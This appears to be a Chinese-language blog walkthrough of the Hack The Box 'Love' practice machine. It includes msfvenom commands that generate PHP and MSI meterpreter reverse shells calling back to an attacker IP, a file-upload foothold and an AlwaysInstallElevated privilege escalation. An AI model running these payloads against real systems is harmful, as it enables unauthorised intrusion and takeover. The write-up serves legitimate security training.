Hack the Box Love 靶机渗透

最新推荐文章于 2023-08-16 12:00:00 发布
最新推荐文章于 2023-08-16 12:00:00 发布
阅读量361 收藏
点赞数 1
分类专栏: Hack The Box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34935231/article/details/119045456
版权

Love 靶机渗透

目标:得到root权限,取得user.txt,root.txt
作者:shadow
时间:2021-07-23

请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

打开80端口发现登录页面,暂时不尝试爆破,打开https看看

重新扫描443端口

 修改hosts文件指定这两个域名解析的IP为靶场的IP 10.10.10.239

echo "10.10.10.239 love.htb staging.love.htb" >> /etc/hosts

二、web渗透

访问staging.love.htb

 查看demo提示我们输入要扫描得网址,我们尝试nmap扫描出的5000端口

 扫描出vote用户名及密码

尝试登录80端口vote(此处卡了好久,一直密码错误,查资料后才知道)

https://www.sourcecodester.com/php/12306/voting-system-using-php.html

登录love.htb/admin

成功登录后台

发现可以上传文件,制作木马上传

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f raw > shell.php

 启动msf监听并访问木马http://love.htb/images/shell.php

成功反弹shell

 

成功取得user.txt

三、提权

查阅资料:找到alwaysinstallelevated,即当注册表中的alwaysinstallelevated设置为1时,机器上运行任何的msi程序,均会以system权限执行,该系统存在此漏洞

生产msi木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4445 -f msi > shell.msi

开启msf监听4445端口

 成功提权获得root.txt

四、总结

windows靶机做的比较少,查找漏洞时需要查看很多资料比如本次得alwaysinstallelevated,还有4台靶机没有整理,明天继续整理,晚安!

c2hhZG93
关注
专栏目录
Hack The Box:Blue靶场
知柯信安
11-25 1389
Blue(蓝盒子) 欢迎订阅蓝色退休盒子! 这是另外一个简单的盒子,非常适合新人们熟悉nmap结果和使用metasploit。我启动这个盒子就像启动任何盒子一样,nmap扫描! 第一次扫描实际上只是用来查看目标主机上已打开并正在运行的内容。看一下,我们只看到3个服务和一堆端口打开。msrpc,netbios-ssn和microsoft-ds。如果这是您第一次入侵Windows计算机,您将经常看到这些服务。您将需要知道这些服务是什么。 MS-RPC是RPC协议的Microsoft实现。它曾经/仍然被用来制
HackTheBox YUMMY靶机渗透实录
最新发布
qq_36129581的博客
10-13 1092
有22端口和80端口,22端口应该暂时用不到。80端口是http服务,可以访问看看有没有突破口。看到这个网页,能交互的都点一下,发现有个预定桌席可以交互,点进去,提交一个预定,然后进面板中,点击保存日历,发现可以下载到文件,这时想到可能可以下载到系统文件。那我们就可以借助这个操作来修改请求来请求文件。这时打开burp软件拦截网页的请求。点击save按键,查看拦截的请求。这个包没什么问题直接forward。
HackTheBox-Love
qq_39966991的博客
07-19 716
OSCP之旅继续前行。今天来做hack the boxlove,级别:简单,主机IP:10.10.10.239 打开kali,链接VPN,然后ping 一下主机,能ping通,开搞! 先用nmap扫一下,扫的过程中打开浏览器访问一下10.10.10.239。 要账号密码,不能注册。从标题看出来网页是PHP。 手动试试sql盲注。简单试了一下,提示ID错误,应该是账号密码错误分开提示,减轻不少压力。 当我盲注使用账号“aaa' or 1=1 #”密码随意填后,提示有变化了。提示密.
Hack The Box】windows练习-- love
人间体佐菲的博客
11-17 707
Hack The Box】windows练习-- love
Hack The Box——OpenKeyS
江左盟的博客
08-22 1万+
目录 简介 信息收集 漏洞发现 登录绕过 漏洞利用 权限提升 总结 简介 靶机比较简单,通过目录扫描发现swp文件,分析文件发现auth.php源码和用户名,然后利用CVE-2019-19521绕过登录,接着伪造Cookie获取用户的SSH私钥,利用该文件登录目标主机,最后利用CVE-2019-19520/CVE-2019-19522成功提升至root权限。 信息收集 使用nmap快速扫描目标主机开放的端口和运行的服务,发现开启22和80端口,分别运行OpenSSH 8.1和OpenB
Hack The Box——Luanne
热门推荐
江左盟的博客
12-06 1万+
目录 简介 信息收集 漏洞发现 Lua代码注入 漏洞利用 权限提升 用户r.michaels的Shell 总结 简介 靶机偏CTF类型,评分才2.3,评分这么低是有原因的。总体思路是通过lua代码注入获得WebShell,然后利用CVE-2010-2320读取普通用户ssh私钥文件,从而获得普通用户权限,最后通过解密enc文件,利用.htpasswd文件中的密码获得root权限。 信息收集 使用Nmap对目标主机进行端口扫描及服务识别,发现目标主机开启22、80和9001端口,且80
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
[Hack The Box] 靶机1 Meow+Paper
Huamang的博客
03-24 1831
前言 久闻HTB平台大名,这里不需要下载镜像自己打了,可以直接在网上开好镜像,连上vpn直接干 这次就算是对这个平台的一个熟悉操作吧 Meow 下载到了open文件,kali连接上 然后测试一下可以ping通了 然后就开nmap跑 nmap -sV 10.129.160.90 开启了23端口,telnet服务,直接连接,root账户 直接拿flag 这个算是白给的 Paper 下面就开始打正式的靶机了 一开始开启靶机ping不通,发现Starting Point和Machines居然不是用的一个
[Hack The Box]靶机8 Optimum
Huamang的博客
04-01 495
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看 打开是HFS,nmap扫出来是HFS2.3 这个版本的HFS是有cve的 https://nvd.nist.gov/vuln/detail/CVE-2014-6287 msf有这个模块 直接拿下shell 拿到user.txt 进不了admin,需要提权 本地起一个python服务,把winpeas传上去 powershell -c "(new-object System.Net.WebClient).Dow.
Hack The Box——Feline
江左盟的博客
03-30 1万+
简介 信息收集 nmap 访问
Hack-The-Box靶机---search
Karka_的博客
08-16 81
其中的80,88,135,445,3268是重点要渗透的端口。
Nibbles - Hack the box
neal1991的专栏
03-17 513
IntroductionTarget: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44Information Enumera...
Hack the box: Bastion
neal1991的专栏
10-10 1335
介绍目标:10.10.10.134 (Windows)Kali:10.10.16.65In conclusion, Bastion is not a medium box...
Hack The Box - Access Writeup
qq_23026851的博客
01-23 1312
第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗。收获还是很大,在此记录一下,以便后阅。 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21(FTP),23(telnet),80(HTTP)。80端口是迷惑信息,先尝试利用FTP。 但是因为不知道登陆FTP的账号密码,这里也卡了很久TAT。后来才发现有anonymous登陆这种操作。上...
Hack the box靶机 Swagshop
菜浪马废的博客
05-22 478
本来想按照顺序 做friendzone的 看看难度 剩下的四个里 他应该最难 还是往后面放一放吧 想想昨天的那个tartarsauce 我都要崩溃了 ![在这里插入图片描述](https://img-blog.csdnimg.cn/202005221558129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4MDA1ODU0,size
Hack The Box——ServMon
江左盟的博客
06-19 805
简介 信息收集 使用 漏洞发现 漏洞利用 权限提升 总结
HackTheBox-Hackerman
网安星空
02-20 393
HackTheBox网站CTF靶场杂项(Misc)相关题目Hackerman,主要知识点为图片的隐写术。
hackthebox-love(上传/windows的reverse-php-shell/ AlwaysInstallElevated)
冬萍子癸水
08-07 451
1 扫描 迅速扫全端口,顺便浏览器打开靶机ip看看界面。写着是voting system投票界面 masscan -p1-65535,U:1-65535 10.10.10.239 --rate=1000 -e tun0 看到开了很多 masscan -p1-65535,U:1-65535 10.10.10.239 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-08-07 02:24:45 GMT -
hack the box three
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值